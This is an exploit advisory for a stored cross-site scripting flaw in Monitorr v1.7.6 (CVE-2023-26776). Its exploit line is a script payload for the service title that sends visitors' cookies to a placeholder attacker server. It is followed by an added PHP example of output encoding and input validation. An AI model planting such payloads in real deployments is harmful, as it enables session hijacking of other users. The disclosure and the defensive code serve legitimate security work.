## https://sploitus.com/exploit?id=PACKETSTORM:171705
# Exploit Title: Monitorr v1.7.6 - Cross Site Scripting  
# CVE: CVE-2023-26776  
# Exploit Author: Achuth V P (retrymp3)  
# Date: February 09, 2023  
# Vendor Homepage: https://github.com/Monitorr/  
# Software Link: https://github.com/Monitorr/Monitorr  
# Tested on: Ubuntu  
# Version: v1.7.6  
# Exploit Description: A Cross Site Scripting vulnerability in Monitorr v1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.  
  
An attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service set to something like <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script>.  
The injected script tag is stored with the service and executed every time the home page is loaded.
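
The stored title issue described above, shown from the defender's side as an added example that is not part of the original advisory and is not Monitorr's own code: the unencoded rendering pattern beside an output-encoded one, plus a save-time allow-list check. The function names, the `title` array key and the `servicetitle` class are hypothetical.

```php
<?php
// Added example; function and field names are hypothetical, not Monitorr's code.

// Save-time check: accept only titles built from an allow-list of characters.
function is_valid_service_title(string $title): bool
{
    // Letters, digits, space and a few separators, 1 to 64 characters.
    return preg_match('/^[\p{L}\p{N} ._()-]{1,64}$/u', $title) === 1;
}

// Vulnerable pattern: the stored title is concatenated into HTML unencoded,
// so markup in the title becomes part of the page for every visitor.
function render_title_unsafe(array $service): string
{
    return '<div class="servicetitle">' . $service['title'] . '</div>';
}

// Hardened pattern: encode for the HTML body context at output time.
function render_title_safe(array $service): string
{
    $encoded = htmlspecialchars($service['title'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="servicetitle">' . $encoded . '</div>';
}

// Constructed sample entries, as they might sit in a stored service list.
$services = [
    ['title' => 'Plex (living room)'],
    ['title' => '<script>document.cookie</script>'], // payload shape from the advisory
];

foreach ($services as $service) {
    printf("valid at save time: %s\n", is_valid_service_title($service['title']) ? 'yes' : 'no');
    printf("unsafe render:      %s\n", render_title_unsafe($service));
    printf("safe render:        %s\n\n", render_title_safe($service));
}
```

Output encoding is the control that matters, because it also covers titles already stored before any save-time check existed; the allow-list only narrows what new entries can contain.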